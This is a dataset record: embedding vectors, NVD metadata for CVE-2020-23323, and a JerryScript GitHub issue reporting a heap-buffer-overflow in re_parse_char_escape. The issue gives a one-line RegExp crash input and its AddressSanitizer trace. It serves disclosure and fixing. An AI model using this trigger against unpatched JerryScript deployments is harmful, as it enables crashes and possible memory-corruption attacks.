-0.0040835002437233925, -0.010068688541650772, 0.003976974170655012, -0.016239311546087265, -0.007235883269459009, 0.03071107715368271, -0.01149692665785551, 0.0037639217916876078, 0.021399907767772675, -0.0064783645793795586, -0.02141568996012211, -0.0034088350366801023, 0.0086246682330966, 0.014637473970651627, -0.025960803031921387, -0.014716382138431072, 0.014534893445670605, 0.0019697463139891624, 0.030632169917225838, -0.0013266443274915218, 0.01080253440886736, -0.033646464347839355, -0.00852997787296772, 0.013288144022226334, 0.020531916990876198, 0.006612508557736874, 0.014258714392781258, 0.00025139664649032056, 0.011220748536288738, -0.023309487849473953, 0.0062732030637562275, -0.000874894845765084, -0.004130844958126545, -0.008806156925857067, -0.014377077110111713, -0.012364917434751987, -0.018685465678572655, -0.027412714436650276, 0.008190672844648361, -0.01289360225200653, 0.024082787334918976, -0.011678416281938553, 0.0013434123247861862, -0.0011954595101997256, 0.01289360225200653, -0.013090873137116432, 0.009973998181521893, 0.006561218295246363, -0.006817670073360205, -0.005918116308748722, -0.003231291426345706, 0.03503524884581566, 0.006999158766120672, 0.006932086776942015, -0.006569108925759792, 0.0009612006833776832, 0.02375137247145176, 0.0042886617593467236, 0.0023258195724338293, 0.009571566246449947, -0.000012229232197569218, 0.0030833384953439236, 0.019979560747742653, 0.010913006030023098, 0.028627900406718254, 0.002813077997416258, 0.011504817754030228, 0.016996828839182854, -0.0004539688234217465, -0.010605264455080032, 0.022173209115862846, -0.0154344467446208, 0.0011195102706551552, -0.0034660433884710073, 0.020516136661171913, -0.016460254788398743, -0.022520404309034348, -0.006363947410136461, -0.01402198988944292, 0.007539680227637291, -0.022551968693733215, 0.029937777668237686, -0.009295388124883175, -0.003673177445307374, 0.02226789854466915, -0.004375460557639599, 0.013114545494318008, -0.010676281526684761, 0.002075286116451025, 0.0057169003412127495, -0.008285362273454666, -0.008167000487446785, 0.01583687961101532, -0.009145461954176426, 0.024650925770401955, 0.008324816823005676, -0.01457434706389904, 0.01832248829305172, 0.013430178165435791, -0.00347590702585876, -0.009137571789324284, 0.006699307356029749, -0.016996828839182854, 0.014298168942332268, 0.029669489711523056, 0.014716382138431072, -0.007251664996147156, 0.01332759764045477, 0.018148889765143394, 0.014235042035579681, -0.0020259683951735497, -0.02452467381954193, -0.01950611174106598, 0.012388589791953564, -0.005113252438604832, -0.014858417212963104, -0.0044622598215937614, 0.014329732395708561, 0.015734298154711723, 0.006849233061075211, -0.024966560304164886, 0.012609533034265041, 0.008427397347986698, -0.00565377390012145, 0.0006253476021811366, 0.008924519643187523, 0.006462582852691412, 0.012459606863558292, -0.0036297780461609364, -0.005858934950083494, -0.01583687961101532, -0.004209753125905991, 0.01617618463933468 ]
1,671
CVE-2020-23323
2021-06-10T23:15:08.293000
There is a heap-buffer-overflow at re-parser.c in re_parse_char_escape in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3871" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3871
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` new RegExp('"\\u', 'u').exec(1) ``` ###### Output ``` ================================================================= ==105443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf600073f at pc 0x080e94ba bp 0xffe285a8 sp 0xffe28598 READ of size 1 at 0xf600073f thread T0 #0 0x80e94b9 in re_parse_char_escape /home/jerryscript/jerry-core/parser/regexp/re-parser.c:615 #1 0x80ea114 in re_parse_next_token /home/jerryscript/jerry-core/parser/regexp/re-parser.c:753 #2 0x80eba19 in re_parse_alternative /home/jerryscript/jerry-core/parser/regexp/re-parser.c:1152 #3 0x80e642e in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:131 #4 0x80afbd2 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:347 #5 0x8129048 in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174 #6 0x81290c1 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:218 #7 0x8080fed in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1260 #8 0x809866e in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1275 #9 0x80f0e29 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:866 #10 0x80ffbd2 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4237 #11 0x81000d5 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4318 #12 0x80eefc0 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:338 #13 0x804e1ce in jerry_run /home/jerryscript/jerry-core/api/jerry.c:595 #14 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #15 0xf784a636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #16 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf600073f is located 0 bytes to the right of 15-byte region [0xf6000730,0xf600073f) allocated by thread T0 here: #0 0xf7a7edee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x80be178 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80be248 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x80be2c7 in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8100214 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:194 #5 0x80619da in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:258 #6 0x80619da in ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:353 #7 0x8073bf5 in ecma_find_or_create_literal_string /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:134 #8 0x80c4501 in parser_compute_indicies /home/jerryscript/jerry-core/parser/js/js-parser.c:130 #9 0x80c61c6 in parser_post_processing /home/jerryscript/jerry-core/parser/js/js-parser.c:973 #10 0x80cbcb9 in parser_parse_source /home/jerryscript/jerry-core/parser/js/js-parser.c:2192 #11 0x80cf05a in parser_parse_script /home/jerryscript/jerry-core/parser/js/js-parser.c:2813 #12 0x804dc81 in jerry_parse /home/jerryscript/jerry-core/api/jerry.c:447 #13 0x804ac76 in main /home/jerryscript/jerry-main/main-unix.c:750 #14 0xf784a636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/parser/regexp/re-parser.c:615 re_parse_char_escape Shadow bytes around the buggy address: 0x3ec00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec000e0: fa fa 00 05 fa fa 00[07]fa fa fd fa fa fa fd fd 0x3ec000f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==105443==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337.
heap-buffer-overflow in re_parse_char_escape
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3871/comments
0
2020-06-07T10:51:46
2020-06-08T09:09:09Z
https://github.com/jerryscript-project/jerryscript/issues/3871
633,297,568
3,871
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : heap-buffer-overflow in re_parse_char_escape Issue date: --- start body --- ###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` new RegExp('"\\u', 'u').exec(1) ``` ###### Output ``` ================================================================= ==105443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf600073f at pc 0x080e94ba bp 0xffe285a8 sp 0xffe28598 READ of size 1 at 0xf600073f thread T0 #0 0x80e94b9 in re_parse_char_escape /home/jerryscript/jerry-core/parser/regexp/re-parser.c:615 #1 0x80ea114 in re_parse_next_token /home/jerryscript/jerry-core/parser/regexp/re-parser.c:753 #2 0x80eba19 in re_parse_alternative /home/jerryscript/jerry-core/parser/regexp/re-parser.c:1152 #3 0x80e642e in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:131 #4 0x80afbd2 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:347 #5 0x8129048 in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174 #6 0x81290c1 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:218 #7 0x8080fed in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1260 #8 0x809866e in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1275 #9 0x80f0e29 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:866 #10 0x80ffbd2 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4237 #11 0x81000d5 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4318 #12 0x80eefc0 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:338 #13 0x804e1ce in jerry_run /home/jerryscript/jerry-core/api/jerry.c:595 #14 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #15 0xf784a636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #16 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf600073f is located 0 bytes to the right of 15-byte region [0xf6000730,0xf600073f) allocated by thread T0 here: #0 0xf7a7edee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x80be178 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80be248 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x80be2c7 in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8100214 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:194 #5 0x80619da in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:258 #6 0x80619da in ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:353 #7 0x8073bf5 in ecma_find_or_create_literal_string /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:134 #8 0x80c4501 in parser_compute_indicies /home/jerryscript/jerry-core/parser/js/js-parser.c:130 #9 0x80c61c6 in parser_post_processing /home/jerryscript/jerry-core/parser/js/js-parser.c:973 #10 0x80cbcb9 in parser_parse_source /home/jerryscript/jerry-core/parser/js/js-parser.c:2192 #11 0x80cf05a in parser_parse_script /home/jerryscript/jerry-core/parser/js/js-parser.c:2813 #12 0x804dc81 in jerry_parse /home/jerryscript/jerry-core/api/jerry.c:447 #13 0x804ac76 in main /home/jerryscript/jerry-main/main-unix.c:750 #14 0xf784a636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/parser/regexp/re-parser.c:615 re_parse_char_escape Shadow bytes around the buggy address: 0x3ec00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec000e0: fa fa 00 05 fa fa 00[07]fa fa fd fa fa fa fd fd 0x3ec000f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==105443==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337. --- end body ---
5,742
[ -0.03972757235169411, 0.007942807860672474, -0.0034808984491974115, 0.0002638581790961325, 0.03488340601325035, 0.0054868971928954124, -0.017184609547257423, 0.019714942201972008, -0.0452212318778038, 0.000006765594662283547, -0.012218663468956947, 0.003589147934690118, -0.010534030385315418, 0.018876008689403534, 0.01274637971073389, 0.033746786415576935, -0.017644669860601425, -0.01951197348535061, -0.023395424708724022, 0.015872085466980934, 0.006251409184187651, -0.01654864475131035, -0.023990798741579056, 0.034531593322753906, -0.012509584426879883, 0.013247033581137657, 0.005608677864074707, 0.020472688600420952, -0.003144310088828206, 0.018429478630423546, 0.012394568882882595, 0.013551485724747181, -0.019281944260001183, 0.005453069228678942, 0.025966351851820946, 0.007036218419671059, 0.016088584437966347, 0.06938793510198593, -0.020743312314152718, -0.010270172730088234, 0.008511117659509182, -0.04129718989133835, -0.031392358243465424, 0.04229849576950073, 0.026940597221255302, 0.0448152981698513, 0.0016465765656903386, -0.007503044325858355, -0.013680032454431057, 0.02725181356072426, 0.001324365148320794, -0.0010148391593247652, -0.009559785015881062, -0.05488250404596329, 0.022921834141016006, -0.004316449165344238, 0.012962878681719303, 0.011149699799716473, 0.030282801017165184, 0.024491451680660248, 0.0011856703786179423, -0.012035992927849293, -0.001499424921348691, 0.011833025142550468, -0.003836092073470354, 0.011934508569538593, 0.007388029247522354, -0.008923819288611412, 0.02545216679573059, 0.016196833923459053, -0.0016947813564911485, -0.002092260168865323, 0.037373144179582596, 0.01939019374549389, -0.004005231894552708, 0.007516575511544943, 0.005622209049761295, 0.028794370591640472, -0.01729285903275013, 0.016697486862540245, -0.019038382917642593, 0.012983175925910473, -0.02277299016714096, 0.014640746638178825, -0.00041671833605505526, -0.015493211336433887, -0.02416670322418213, -0.05493662878870964, 0.003147692885249853, -0.04446348547935486, -0.026494067162275314, 0.04375986382365227, -0.03371972218155861, 0.010554327629506588, -0.015412024222314358, 0.02136574685573578, -0.057588741183280945, 0.0008144084131345153, -0.06056560203433037, 0.03450453281402588, -0.02029678411781788, 0.024437326937913895, -0.017225204035639763, -0.0014918135711923242, 0.0159397404640913, 0.04240674525499344, 0.018605384975671768, -0.023530738428235054, 0.03899688646197319, 0.10132154077291489, 0.026954127475619316, -0.023273644968867302, -0.01870010234415531, 0.012773442082107067, -0.00885616336017847, 0.0052095078863203526, -0.01902485080063343, -0.02190699428319931, -0.04300211742520332, 0.026494067162275314, -0.02343601919710636, -0.022515898570418358, 0.001725226640701294, -0.010581390000879765, -0.016643362119793892, 0.019092507660388947, 0.006312299519777298, -0.0076383561827242374, 0.002148076193407178, -0.0448152981698513, -0.05780524015426636, -0.03842857480049133, 0.0032643992453813553, -0.023990798741579056, 0.024180235341191292, 0.024532046169042587, -0.018876008689403534, 0.03174417093396187, 0.00006300459790509194, -0.03507284075021744, -0.022827114909887314, 0.008950881659984589, 0.02606106922030449, -0.034612782299518585, -0.020459158346056938, 0.0031781380530446768, -0.004756212700158358, 0.01943078637123108, -0.011927743442356586, -0.022827114909887314, 0.02190699428319931, -0.00965450331568718, 0.034071534872055054, 0.013456767424941063, 0.0361553356051445, -0.011697712354362011, 0.03369266167283058, 0.05431419238448143, -0.020405033603310585, 0.014586621895432472, -0.03223129361867905, -0.033043164759874344, 0.01531730592250824, -0.005513959564268589, -0.04178431257605553, 0.005892832763493061, 0.0010833408450707793, 0.012651661410927773, -0.008254025131464005, 0.016440395265817642, -0.03902394697070122, 0.014803120866417885, 0.011887149885296822, 0.026385817676782608, -0.03986288234591484, 0.0017226894851773977, 0.013558250851929188, -0.0005095338565297425, -0.009647737257182598, 0.0022613999899476767, -0.014667809009552002, 0.004996391478925943, -0.00949212908744812, 0.018023543059825897, 0.014275404624640942, -0.03158179670572281, -0.020783906802535057, -0.051499705761671066, 0.022367054596543312, -0.04581660404801369, -0.01819944940507412, -0.0036229758989065886, -0.012556943111121655, -0.01667042449116707, 0.028713183477520943, 0.03426096960902214, -0.032637227326631546, -0.04040412977337837, 0.022123493254184723, 0.00939064472913742, 0.044896483421325684, 0.000019530369172571227, -0.04403048753738403, -0.019701411947607994, -0.015845023095607758, 0.0024829732719808817, -0.010567858815193176, 0.006640431005507708, 0.02573632076382637, 0.017861168831586838, -0.02809074893593788, -0.03861801326274872, 0.02541157230734825, -0.031690046191215515, -0.0014317688765004277, -0.0067588286474347115, -0.005557935684919357, -0.031121734529733658, -0.028009561821818352, 0.011474448256194592, 0.023111270740628242, -0.003545171581208706, -0.033990345895290375, -0.006559243891388178, -0.04746741056442261, -0.019173694774508476, -0.027278875932097435, 0.0034842812456190586, -0.023449551314115524, 0.01460015308111906, 0.004431464243680239, -0.02462676353752613, 0.005974019877612591, 0.01070317067205906, 0.004018763080239296, -0.01274637971073389, -0.01922781951725483, 0.0006308917072601616, -0.004938884172588587, 0.00916061457246542, -0.008139010518789291, -0.006782508455216885, -0.018970726057887077, -0.0309593603014946, 0.014383654110133648, 0.03204185515642166, -0.02037797123193741, -0.02639934979379177, -0.03480221703648567, 0.005811645649373531, -0.02416670322418213, -0.027035314589738846, 0.005453069228678942, -0.004468675237149, -0.017982950434088707, -0.001699855551123619, 0.02021559700369835, 0.02920030616223812, 0.003876685630530119, -0.006200667470693588, 0.034612782299518585, 0.03832032531499863, -0.010337828658521175, 0.018429478630423546, 0.01117676217108965, 0.004008614923804998, -0.033286724239587784, 0.007726308889687061, -0.016819268465042114, -0.04454467445611954, 0.05969960615038872, -0.04903702810406685, -0.019444318488240242, -0.008456992916762829, -0.006796039640903473, -0.002063506282866001, -0.01070317067205906, 0.04381398856639862, -0.008226962760090828, -0.04162193834781647, 0.0018182535422965884, 0.025086823850870132, 0.01492490153759718, 0.04332686588168144, 0.01565558649599552, -0.009925127029418945, 0.042975056916475296, 0.0016939357155933976, 0.02936268039047718, -0.022123493254184723, 0.0004896598984487355, -0.013023769482970238, -0.020283252000808716, 0.012299850583076477, -0.0019417256116867065, 0.022759459912776947, 0.0007163073169067502, 0.007854855619370937, -0.007090343162417412, 0.012326912954449654, -0.035803526639938354, -0.025262730196118355, -0.004441612865775824, 0.031148796901106834, -0.054043568670749664, -0.0007323755999095738, 0.00773984007537365, 0.008416399359703064, -0.016413332894444466, -0.008477290160953999, 0.05453069135546684, -0.03174417093396187, -0.02593928948044777, -0.011785665526986122, -0.03474809229373932, -0.02206936851143837, 0.01531730592250824, 0.02252942882478237, -0.0003837360709439963, 0.018375353887677193, -0.05279869958758354, -0.01428893581032753, -0.02384195476770401, 0.01708989217877388, 0.04367867857217789, -0.012739614583551884, -0.010391953401267529, 0.009147083386778831, -0.047332100570201874, 0.013247033581137657, 0.02412611059844494, -0.011833025142550468, -0.01276667695492506, -0.015412024222314358, -0.04059356823563576, -0.027901312336325645, -0.024437326937913895, 0.061539847403764725, 0.025235667824745178, -0.012949347496032715, -0.04121600091457367, 0.020892156288027763, 0.007523341104388237, 0.012692254967987537, 0.016900455579161644, -0.0016254340298473835, -0.005212890449911356, 0.019620224833488464, 0.023706642910838127, 0.022840647026896477, 0.0009674800094217062, 0.009640972130000591, 0.03850976377725601, 0.007049749605357647, 0.02718415856361389, -0.046628475189208984, -0.03978169709444046, -0.023124800994992256, 0.0061499252915382385, 0.013341751880943775, -0.013084659352898598, -0.015885615721344948, -0.005557935684919357, 0.013693563640117645, 0.029633304104208946, -0.014965495094656944, 0.012394568882882595, 0.005057281814515591, -0.021216904744505882, -0.011366198770701885, -0.03639889881014824, 0.02817193605005741, 0.005892832763493061, 0.004137161187827587, -0.007936042733490467, -0.03290785104036331, 0.010885841213166714, -0.000935343443416059, -0.0022613999899476767, 0.00738126365467906, -0.008179604075849056, 0.010141626000404358, 0.014302466996014118, -0.015168462879955769, -0.014329529367387295, 0.03796851634979248, -0.011007621884346008, 0.004306301008909941, 0.019755536690354347, -0.01321997120976448, -0.03740020468831062, 0.052068013697862625, -0.043543364852666855, -0.026656441390514374, -0.02293536439538002, 0.00868702307343483, -0.021473996341228485, -0.0033946370240300894, 0.025709258392453194, -0.0344233438372612, 0.004641197621822357, -0.023625455796718597, 0.008193135261535645, 0.008396103046834469, -0.02446438930928707, 0.012611067853868008, 0.0016212055925279856, -0.04495060816407204, 0.02297595888376236, -0.0015882232692092657, 0.02190699428319931, -0.010716701857745647, -0.019782599061727524, 0.0010681182611733675, 0.05385413020849228, 0.05347525700926781, 0.03907807543873787, -0.01292905118316412, -0.019999098032712936, 0.010182219557464123, -0.0245455764234066, 0.003276239149272442, 0.022015243768692017, 0.0332055389881134, -0.0066336654126644135, 0.005297460593283176, -0.016819268465042114, 0.01313878409564495, 0.0013159081572666764, -0.01918722502887249, -0.017482295632362366, -0.01775291934609413, 0.00805105734616518, 0.013179377652704716, 0.013125252909958363, -0.06305534392595291, -0.021352216601371765, -0.044003427028656006, -0.03307022526860237, -0.0027434485964477062, 0.01500608865171671, 0.021433403715491295, -0.028631996363401413, -0.061702221632003784, 0.0013006855733692646, 0.004935501143336296, -0.019322536885738373, -0.0039984663017094135, 0.00438410509377718, 0.015263181179761887, -0.018713634461164474, 0.0015044991159811616, -0.027333002537488937, -0.0012008929625153542, 0.020120877772569656, -0.029958052560687065, -0.06771007180213928, 0.005236570257693529, 0.0030783454421907663, 0.012333679012954235, -0.02936268039047718, 0.015371430665254593, 0.0016913985600695014, -0.03807676583528519, -0.013274095952510834, 0.040377069264650345, 0.01902485080063343, -0.037860266864299774, -0.010872310027480125, -0.04446348547935486, 0.01832122914493084, -0.004170989152044058, 0.01500608865171671, -0.008416399359703064, -0.010574623942375183, 0.020621532574295998, 0.01589914783835411, -0.032095979899168015, 0.01075052935630083, -0.01708989217877388, 0.01428893581032753, -0.00006580597982974723, -0.011149699799716473, 0.04081006720662117, 0.037075456231832504, -0.034531593322753906, 0.013991249725222588, 0.0008308995747938752, 0.014464841224253178, 0.025438634678721428, 0.013747688382863998, 0.0005898752715438604, -0.028875557705760002, -0.042109061032533646, -0.006748680491000414, -0.024031391367316246, -0.04570835456252098, 0.0005666185170412064, 0.031690046191215515, 0.007401560433208942, 0.021216904744505882, -0.04687203839421272, 0.06392133980989456, 0.0026047539431601763, 0.008666726760566235, -0.03664245828986168, -0.0512290820479393, 0.07003743201494217, -0.004292769823223352, -0.0369672067463398, 0.028388435021042824, -0.05085020884871483, 0.005392178893089294, -0.01956610009074211, -0.01309142541140318, -0.014004780910909176, 0.031690046191215515, 0.010845247656106949, 0.01729285903275013, 0.02144693396985531, -0.01791529357433319, -0.006254792213439941, -0.017942355945706367, 0.039889946579933167, 0.03672364726662636, -0.012935816310346127, 0.02713003382086754, -0.005321139935404062, -0.00590974697843194, -0.024856794625520706, 0.003213657299056649, 0.006511884741485119, -0.014870776794850826, 0.053556445986032486, 0.011061746627092361, -0.012144242413341999, -0.009749221615493298, 0.01856479048728943, 0.001590760424733162, -0.005216273479163647, 0.008064588531851768, 0.0533670075237751, -0.02095981128513813, 0.006407017819583416, -0.004448378458619118, 0.0036568038631230593, -0.013389111496508121, 0.003592530731111765, 0.04378692805767059, 0.025790445506572723, 0.002132853725925088, -0.01618330180644989, -0.006789274048060179, 0.021798744797706604, -0.005652653984725475, -0.020648594945669174, -0.01171800959855318, 0.025343917310237885, -0.002951490692794323, 0.0004025528614874929, -0.006829867605119944, -0.029822740703821182, 0.0029531819745898247, -0.024099048227071762, -0.008490821346640587, -0.005260249599814415, -0.003052974585443735, 0.046628475189208984, -0.05542375147342682, 0.016738081350922585, 0.0018030309583991766, 0.00510802399367094, 0.012401334941387177, -0.02499210648238659, -0.019877316430211067, -0.0018470073118805885, -0.027197688817977905, 0.003869920037686825, 0.03718370571732521, 0.0035756167490035295, 0.0071715302765369415, -0.01902485080063343, -0.014491903595626354, 0.04895584285259247, 0.011609760113060474, -0.002723151817917824, 0.008247260004281998, 0.001660107751376927, 0.009248567745089531, -0.02503269910812378, 0.0013522731605917215, -0.00165249640122056, -0.023814892396330833, -0.014884307980537415, 0.015127869322896004, -0.000887984293513, 0.004783275071531534, 0.01815885491669178, 0.018023543059825897, -0.023977266624569893, 0.007949573919177055, 0.022989489138126373, 0.010872310027480125, -0.012523115612566471, 0.0006824793526902795, 0.025925757363438606, -0.0226106159389019, -0.004495737608522177, -0.006505119148641825, 0.04240674525499344, 0.009566550143063068, 0.020147940143942833, 0.03561408817768097, -0.013774750754237175, -0.015100806951522827, -0.007746605668216944, 0.008193135261535645, 0.027157096192240715, -0.030661674216389656, 0.011697712354362011, 0.0017742771888151765, -0.04514004662632942, 0.00657954066991806, -0.021338684484362602, -0.0038935996126383543, 0.017779981717467308, -0.01091290358453989, -0.028361372649669647, -0.006900906562805176, 0.009708628058433533, 0.012658427469432354, 0.021758152171969414, -0.008111948147416115, -0.019051913172006607, -0.00955301895737648, 0.038807447999715805, 0.003511343616992235, 0.019403723999857903, 0.004143926780670881, -0.015682648867368698, 0.0027468313928693533, 0.026155788451433182, -0.02960624173283577, -0.011068512685596943, -0.020729782059788704, -0.005064047407358885, 0.00017823113012127578, -0.00032369140535593033, 0.0027975733391940594, 0.026494067162275314, -0.03780614212155342, -0.011183527298271656, 0.017279328778386116, 0.007807496003806591, -0.01268548984080553, 0.000800877227447927, 0.04067475348711014, 0.04714266210794449, -0.023490143939852715, -0.024762075394392014, -0.02190699428319931, -0.020161472260951996, -0.0066641103476285934, 0.00007817432924639434, 0.02618285082280636, -0.0161427091807127, -0.007550403475761414, 0.010337828658521175, 0.004130395594984293, 0.029416805133223534, -0.014180686324834824, -0.0018081051530316472, -0.00031269731698557734, 